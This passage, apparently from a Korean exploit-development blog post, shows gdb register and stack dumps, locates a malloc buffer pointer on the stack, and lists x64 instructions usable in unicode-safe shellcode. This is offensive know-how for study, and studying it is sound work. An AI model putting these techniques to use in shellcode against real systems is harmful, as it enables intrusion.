<span style="font-family: 'Courier New';">rax 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">rbx 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">rcx 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">rdx 0x7ffff7ff6000</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">140737354096640</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">rsi 0x1</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">1</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: red; font-family: 'Courier New';">rdi 0x0</span><span class="Apple-tab-span" style="color: red; font-family: 'Courier New'; white-space: pre;"> </span><span style="color: red; font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">rbp 0x7fffffffe060</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x7fffffffe060</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">rsp 0x7fffffffe020</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x7fffffffe020</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">r8 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">r9 0x300000</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">3145728</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">r10 0x7fffffffddc0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">140737488346560</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">r11 0x7ffff7a959b0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">140737348458928</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">r12 0x400f80</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">4198272</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">r13 0x7fffffffe1e0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">140737488347616</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">r14 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">r15 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">rip 0x401226</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x401226</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">eflags 0x206</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">[ PF IF ]</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">cs 0x33</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">51</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">ss 0x2b</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">43</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">ds 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">es 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">fs 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">gs 0x0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">(gdb) x/10x $rsp</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">0x7fffffffe018:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x00401228</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x00000000</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0xffffe060</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x00007fff</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">0x7fffffffe028:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x00000000</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x00000008</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x00001000</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">0x00000000</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="color: red; font-family: 'Courier New';">0x7fffffffe038:</span><span class="Apple-tab-span" style="color: red; font-family: 'Courier New'; white-space: pre;"> </span><span style="color: red; font-family: 'Courier New';">0x00606a90</span><span class="Apple-tab-span" style="color: red; font-family: 'Courier New'; white-space: pre;"> </span><span style="color: red; font-family: 'Courier New';">0x00000000</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';">(gdb) </span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
We found that the malloc buffer pointer is at [RSP+0x20].</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
Below is a partial list of ASCII-unicode proof x64 instructions</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
(plus the register PUSH/POP instructions).</div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6036:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bl,(%rax,%rax,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6039:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">sbb $0x1f001e00,%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff603e:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ah,(%rax)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6040:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ah,(%rcx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6042:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ah,(%rdx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6044:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ah,(%rbx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6046:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ah,(%rax,%rax,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6049:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">and $0x27002600,%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff604e:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,(%rax)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6050:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,(%rcx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6052:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,(%rdx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6054:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,(%rbx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6056:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,(%rax,%rax,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6059:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">sub $0x2f002e00,%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff605e:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %dh,(%rax)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6060:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %al,(%rax)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6062:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %dh,(%rcx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6064:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %dh,(%rdx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6066:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %dh,(%rbx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6068:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %dh,(%rax,%rax,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff606b:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">xor $0x37003600,%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6070:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bh,(%rax)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6072:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bh,(%rcx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6074:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bh,(%rdx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6076:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bh,(%rbx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6078:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bh,(%rax,%rax,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff607b:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">cmp $0x3f003e00,%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6080:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %al,0x0(%rax)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6083:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %al,0x0(%r10)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6087:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %al,0x45(%r8,%r8,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff608c:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %al,0x0(%rsi)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff608f:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">rex.RXB add %r9b,0x0(%r8)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6093:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">rex.WB add %cl,0x0(%r10)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff6097:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">rex.WXB add %cl,0x4d(%r8,%r8,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff609c:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %cl,0x0(%rsi)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff609f:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">rex.WRXB add %r10b,0x0(%r8)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60a3:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">push %rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60a4:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %dl,0x0(%rdx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60a7:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">push %rbx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60a8:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %dl,0x55(%rax,%rax,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60ac:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %dl,0x0(%rsi)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60af:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">push %rdi</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60b0:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bl,0x0(%rax)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60b3:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">pop %rcx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60b4:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bl,0x0(%rdx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60b7:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">pop %rbx</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60b8:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bl,0x5d(%rax,%rax,1)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60bc:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %bl,0x0(%rsi)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60bf:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">pop %rdi</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60c0:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ah,0x0(%rax)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60c3:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">(bad) </span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60c4:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ah,0x0(%rdx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60c7:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">movslq (%rax),%eax</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New'; font-size: 9pt; line-height: 1.5;"> 0x7ffff7ff60c9:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; font-size: 9pt; line-height: 1.5; white-space: pre;"> </span><span style="font-family: 'Courier New'; font-size: 9pt; line-height: 1.5;">add %ah,%fs:0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60cd:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">data16</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60ce:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ah,0x0(%rdi)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60d1:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">pushq $0x6a006900</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60d6:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60d9:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">insb (%dx),%es:(%rdi)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60da:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rbp)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60dd:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">outsb %ds:(%rsi),(%dx)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60de:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">add %ch,0x0(%rdi)</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60e1:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jo 0x7ffff7ff60e3</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60e3:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jno 0x7ffff7ff60e5</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60e5:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jb 0x7ffff7ff60e7</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60e7:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jae 0x7ffff7ff60e9</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60e9:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">je 0x7ffff7ff60eb</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60eb:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jne 0x7ffff7ff60ed</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60ed:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jbe 0x7ffff7ff60ef</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60ef:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">ja 0x7ffff7ff60f1</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60f1:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">js 0x7ffff7ff60f3</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60f3:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jns 0x7ffff7ff60f5</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60f5:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jp 0x7ffff7ff60f7</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"> 0x7ffff7ff60f7:</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">jnp 0x7ffff7ff60f9</span></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
